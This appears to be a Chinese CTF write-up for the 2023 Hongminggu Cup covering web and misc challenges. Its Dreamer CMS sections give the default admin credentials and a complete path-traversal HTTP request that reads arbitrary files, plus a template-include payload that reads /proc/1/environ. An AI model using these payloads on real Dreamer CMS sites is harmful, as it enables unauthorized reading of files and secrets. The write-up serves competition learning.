红明谷杯 2023 Writeup

3 min read

DNA 编码给👴整无语了… PUA 了半天 ChatGPT 没整出来,整体来说题目还可以。

Web

点击签到

每一次点击都是为了让你更接近flag!

没啥好说的,点击 连点10次 点快了会出现冷却时间,我们直接连点器点第一个按钮就行了,或者手动点击一次之后一直按住回车

image-20230419171552030

Dreamer

Dreamer with jdk8u181 (flag in /flag)(本题下发后,请通过http访问相应的ip和port,例如 nc ip port ,改为 http://ip:port/

用的是开源的 Dreamer CMS,直接根据 issue 信息找到可利用漏洞,同时 README 文件中提到了默认后台地址和用户密码

网站首页:https://localhost:8888 项目管理后台:https://localhost:8888/admin
管理后台用户名:wangjn;密码:123456

登录之后直接根据公开的漏洞细节利用实现即可任意文件读取

POST /admin/attachment/add HTTP/1.1
Host: 39.105.223.140:45331
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dreamer-cms-s=ebcb98a0-f636-48c3-84e9-c7bafe32f6fe
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

filename=test.whatever&filepath=../../../../../../../../../../../../flag&filetype=whatever&filesize=317&file=

发包之后直接去 附件管理 里面下载即可得到 flag

image-20230419172246996

Dreamer_revenge

Dreamer with jdk8u212 (附件和Dreamer一样)

针对 Dreamer 题目的修改,过滤了上一题我们用到的文件读取方法(无法进行下载操作了),但是根据 Dreamer CMS 代码审计 这篇文件里面提到的其他漏洞发现 编辑模板 里还可以进行文件包含,但 flag 找不到位置,经过一番 fuzz 发现 flag 写进了环境变量里

{dreamer-cms:include file='../../../../../../../../../../../../proc/1/environ'/}

image-20230419172938933

image-20230419172902327

Misc

阿尼亚

阿尼亚不可爱嘛

下载附件得到一个图片和一个加密压缩包,使用16进制编辑器在图片尾部发现一段数字

6333383363333963633338326333616263333865633261616332613363326261633262636333623263326235633261356332623563333834633262316333613063333832633361623061

直接使用 cyberchef 一把梭,得到密码 简单的编码

image-20230419170614794

搜索图片文件名 netpixeljihad 找到一个隐写网站,解密后得到压缩包的密码

image-20230419170133167

+-+-++--+- ++---+-++- -+--++-++- +--++-++-- --+++++--- ++-++---+- +++-+-+--- +-+-+---++ ---+++-++- -+--++-++- -+--+++-+- -+--++-++- -+--++-++- ++-+-+-+-- -+--+++-+- ++-++---+- -++++---+- -+--++-++- ++-+-+-+-- +-+++---+- +++-++---- ---+++-++- +-+-+---++ ++-+-+-+-- +-+-+--++- ++--+--++- -++++---+- +---+++-+- ++-+-+-+-- -++++---+- -+--+++-+- +--+-+-++- +++-+-+--- +-+++---+- -+--+-+++- -+--++-++- ---+++-++- ++++----+- -++++---+- -+--+++-+- -+--++-++- ----+++++-

没啥好说的,直接通过 cipher-identifier 预测一下可能的编码,发现是 decabit 编码,直接梭

image-20230419171140015